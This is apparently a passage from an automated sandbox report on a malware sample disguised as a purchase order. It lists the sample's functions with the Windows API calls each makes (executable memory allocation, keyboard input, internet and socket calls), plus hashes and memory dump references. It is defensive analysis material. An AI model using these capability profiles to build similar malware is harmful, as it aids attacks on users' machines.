                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d774595cd4350f1ae57432c01d8168699274f923cd0119b5cfd88b681c4022e
                        • Instruction ID: 1899e85fb0a59a6d3183409ed532f26a09b14dda6594c172669df75fec54d003
                        • Opcode Fuzzy Hash: 9d774595cd4350f1ae57432c01d8168699274f923cd0119b5cfd88b681c4022e
                        • Instruction Fuzzy Hash: CAC1BF75A6025AEFCB14CFA5C894EAEB7B5FF48304F508598E801EB251D730EE51CBA1
                        Function 002BAA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00306AA6), ref: 002BAB2D
                        • _wcscmp.LIBCMT ref: 002BAB49
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcscmp
                        • String ID:
                        • API String ID: 820872866-0
                        • Opcode ID: 2028c614d5c97319f5b3d809169820c35d0f56bdc22b464fbaeea466f571280b
                        • Instruction ID: ff28a84ce948f3f909ea3f132bd95919628bbaa0865b5c48439b7cdaae6adfe0
                        • Opcode Fuzzy Hash: 2028c614d5c97319f5b3d809169820c35d0f56bdc22b464fbaeea466f571280b
                        • Instruction Fuzzy Hash: 38A1157172010BDBDB15DF65E9816ADBBB5FF44380F64416AEC56C32A0EB309870CB92
                        Function 00310D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 00310D85
                        • CharLowerBuffW.USER32(?,?), ref: 00310DC8
                          • Part of subcall function 00310458: CharLowerBuffW.USER32(?,?,?,?), ref: 00310478
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00310FB2
                        • _memmove.LIBCMT ref: 00310FC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: 03ca72c61a88c74c2d47288d7e448bd9460088c920d30ef6e12eba149409ca47
                        • Instruction ID: 735f4feea7e01c3fd1f68adcb3768c7a8895707984d228ea5c24c8fbe5731ccf
                        • Opcode Fuzzy Hash: 03ca72c61a88c74c2d47288d7e448bd9460088c920d30ef6e12eba149409ca47
                        • Instruction Fuzzy Hash: 02B1BF716043008FC709DF28C48099AB7E5EF88754F14896EF8899B351DB71ED86CF91
                        Function 0030AF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0030AF56
                        • CoUninitialize.OLE32 ref: 0030AF61
                          • Part of subcall function 002F1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002F10B8
                        • VariantInit.OLEAUT32(?), ref: 0030AF6C
                        • VariantClear.OLEAUT32(?), ref: 0030B23F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        • Opcode ID: dfa967508dd0f256e323f9e73167fb075bd8bbb3361f93015bb6d7cec5e5dbb7
                        • Instruction ID: 96b70dccf4b11faeb99143a9ce26f816c15fa8313e898e60b15a4f933c0a01a0
                        • Opcode Fuzzy Hash: dfa967508dd0f256e323f9e73167fb075bd8bbb3361f93015bb6d7cec5e5dbb7
                        • Instruction Fuzzy Hash: 11A159352147019FC711DF14C8A1B6AB7E8BF88360F158959F999AB3A1DB30ED54CF82
                        Function 002D42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                        • String ID:
                        • API String ID: 3877424927-0
                        • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                        • Instruction ID: e04220e1425c3a24e0dd23a11013dee86112e023dc424116e43402b3d1c27fc5
                        • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                        • Instruction Fuzzy Hash: 3051A630A203469BDB64AFADC8846AE77B5AF40324F34876FF865963D0D7709DB19B40
                        Function 0031C2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(01698308,?), ref: 0031C354
                        • ScreenToClient.USER32(?,00000002), ref: 0031C384
                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0031C3EA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 26044dacd4e63944e369369496b4861de2b9d7ca87d21947c47eb2195755b17c
                        • Instruction ID: ba7625a2fe25ecbcc65624bbe191fccc928f53a3d29311e02c97bbb1ce26c46b
                        • Opcode Fuzzy Hash: 26044dacd4e63944e369369496b4861de2b9d7ca87d21947c47eb2195755b17c
                        • Instruction Fuzzy Hash: A2517035910204EFCF26CF68C880AEE7BBABB49360F258559F8259B291D770DD81CB90
                        Function 002ED206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002ED258
                        • __itow.LIBCMT ref: 002ED292
                          • Part of subcall function 002ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002ED549
                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002ED2FB
                        • __itow.LIBCMT ref: 002ED350
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$__itow
                        • String ID:
                        • API String ID: 3379773720-0
                        • Opcode ID: 4fb31d5d6f6430db39c8bc1d5792c84f4e1bf3356f541008adc038ef9d4c49c7
                        • Instruction ID: 335f8f29f41f5359ccf25637fbcc2d2c640a03c73610693ffb13ce510eb79087
                        • Opcode Fuzzy Hash: 4fb31d5d6f6430db39c8bc1d5792c84f4e1bf3356f541008adc038ef9d4c49c7
                        • Instruction Fuzzy Hash: EE41E671A10649ABDF11DF54CC42BEE7BB9AF58700F400069FA05A3282DBB09A65CF62
                        Function 002FEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002FEF32
                        • GetLastError.KERNEL32(?,00000000), ref: 002FEF58
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002FEF7D
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002FEFA9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: 3ca41a73bdd5f8c63fb5615304493e0450c511b169fcac8bc33034bfea181393
                        • Instruction ID: 66779842813d9a3113ebc0d646603643e1fdc3266d8e839cb066ea8ebae196b3
                        • Opcode Fuzzy Hash: 3ca41a73bdd5f8c63fb5615304493e0450c511b169fcac8bc33034bfea181393
                        • Instruction Fuzzy Hash: 61414C39610611DFCB11EF14C544A59BBF9EF89760B198098E959AF362CB30FD10DF91
                        Function 0031B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0031B3E1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: 32b649eaa0c784c33a35f336394dd98568aa12d6d3206f99352152ec7a074cd5
                        • Instruction ID: 42003c1c5ecd2d76d3e03faec401977532ec0d677d53c4be1c4a060a286d1ab2
                        • Opcode Fuzzy Hash: 32b649eaa0c784c33a35f336394dd98568aa12d6d3206f99352152ec7a074cd5
                        • Instruction Fuzzy Hash: 9731D039600204FBEF3B9E59DC85BE8B768AB0D350F65C512FA61D65A2CB30E8D09B51
                        Function 0031D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 0031D617
                        • GetWindowRect.USER32(?,?), ref: 0031D68D
                        • PtInRect.USER32(?,?,0031EB2C), ref: 0031D69D
                        • MessageBeep.USER32(00000000), ref: 0031D70E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: 2ca1d227bfe43ad117d47ed61aeb4468b915ad367bb648541e7d50bc11aee79d
                        • Instruction ID: db1f19d44bd05de08c663cd26b866e9caa4d43a457c65c2c14ba6a64d1f28c22
                        • Opcode Fuzzy Hash: 2ca1d227bfe43ad117d47ed61aeb4468b915ad367bb648541e7d50bc11aee79d
                        • Instruction Fuzzy Hash: 5F416E31600118EFCB1BCF58E884BE97BF9BB4A300F5941A9E4599F291D730E881CB51
                        Function 002F4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002F44EE
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 002F450A
                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 002F456A
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002F45C8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 51b80320cdeb4275ac25ba93aeab97df724332d2134deaa533278ab0ff7f19cc
                        • Instruction ID: 240339d8a05da7687cb3f3c713fb7164224db1c7a230152d88e7e5a95e7d4945
                        • Opcode Fuzzy Hash: 51b80320cdeb4275ac25ba93aeab97df724332d2134deaa533278ab0ff7f19cc
                        • Instruction Fuzzy Hash: 1B31287192025D5FEF31BF64D808BBFFBA59B65394F84013AF281522C1C7B88A64CB61
                        Function 002E4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E4DE8
                        • __isleadbyte_l.LIBCMT ref: 002E4E16
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002E4E44
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002E4E7A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: d77c2550fb3bbbd0b822a9cf1bf841d66b3017189eaf3ea8698678c7f9bbfaac
                        • Instruction ID: 19cc836f1597fc74fa03b47f0786f69816ce4f59a5b395a59ca2a93e014fbc38
                        • Opcode Fuzzy Hash: d77c2550fb3bbbd0b822a9cf1bf841d66b3017189eaf3ea8698678c7f9bbfaac
                        • Instruction Fuzzy Hash: 7D31C431A50286AFDF21AF76CC45B6A7BA9FF41310F594569F821871A0E730EC70DB90
                        Function 00317AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 00317AB6
                          • Part of subcall function 002F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 002F69E3
                          • Part of subcall function 002F69C9: GetCurrentThreadId.KERNEL32 ref: 002F69EA
                          • Part of subcall function 002F69C9: AttachThreadInput.USER32(00000000,?,002F8127), ref: 002F69F1
                        • GetCaretPos.USER32(?), ref: 00317AC7
                        • ClientToScreen.USER32(00000000,?), ref: 00317B00
                        • GetForegroundWindow.USER32 ref: 00317B06
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 0e757eda653a5ad1bc9b68f9aeebf0b1a50f8b390269b792cbcf7327e02adbab
                        • Instruction ID: 186c6315247cd8a5277076245c8727913f7397dfedc7a64a4c3b4f8009eb2f45
                        • Opcode Fuzzy Hash: 0e757eda653a5ad1bc9b68f9aeebf0b1a50f8b390269b792cbcf7327e02adbab
                        • Instruction Fuzzy Hash: 65310B72D10108AFCB11EFB6D8859EFBBFDEF58350B10806AE815E7211DA359E158FA0
                        Function 0031EFA8 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • GetCursorPos.USER32(?), ref: 0031EFE2
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0032F3C3,?,?,?,?,?), ref: 0031EFF7
                        • GetCursorPos.USER32(?), ref: 0031F041
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0032F3C3,?,?,?), ref: 0031F077
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 7715733eb6130213537d0d021115aa21b1cf319788881fc32d2ce78d075ab6c1
                        • Instruction ID: 42de650c4a54723a5d668398e681a55dcbb5f8f418df3dc9dc06db86fd81e1b9
                        • Opcode Fuzzy Hash: 7715733eb6130213537d0d021115aa21b1cf319788881fc32d2ce78d075ab6c1
                        • Instruction Fuzzy Hash: 9821D636500018FFCB2B8F58D898EEA7BB9FB4D764F054069F909472A2C3319D91DB91
                        Function 0030497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003049B7
                          • Part of subcall function 00304A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00304A60
                          • Part of subcall function 00304A41: InternetCloseHandle.WININET(00000000), ref: 00304AFD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Internet$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 1463438336-0
                        • Opcode ID: 0759a67458b813ce7037f0970ae8894d09c5e28b8289dfddbb0a36abf1424a63
                        • Instruction ID: c2890edb60ee9d91bb0bea22c198b14eedc2691fd133de823c708c9c8a950cae
                        • Opcode Fuzzy Hash: 0759a67458b813ce7037f0970ae8894d09c5e28b8289dfddbb0a36abf1424a63
                        • Instruction Fuzzy Hash: 7521D471341605BFDB139F609C11FBBB7ADFB88711F10401AFB0596590EB71D920AB94
                        Function 00318834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 003188A3
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003188BD
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 003188CB
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003188D9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: 65295d3345453e255b20bc40ddba1e3d9f174621eb82c2c3040ab833d5db809f
                        • Instruction ID: 09466602feab39a2dc44090944ca88fb711141b4140bd4c100bf3480db2f13d8
                        • Opcode Fuzzy Hash: 65295d3345453e255b20bc40ddba1e3d9f174621eb82c2c3040ab833d5db809f
                        • Instruction Fuzzy Hash: 3611AF31214514AFDB19AB24DC55FEA77ADAF89360F144119F816CB2A1CB60AC508B94
                        Function 0030900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                        Download Yara Rule
                        APIs
                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0030906D
                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0030907F
                        • accept.WSOCK32(00000000,00000000,00000000), ref: 0030908C
                        • WSAGetLastError.WSOCK32(00000000), ref: 003090A3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastacceptselect
                        • String ID:
                        • API String ID: 385091864-0
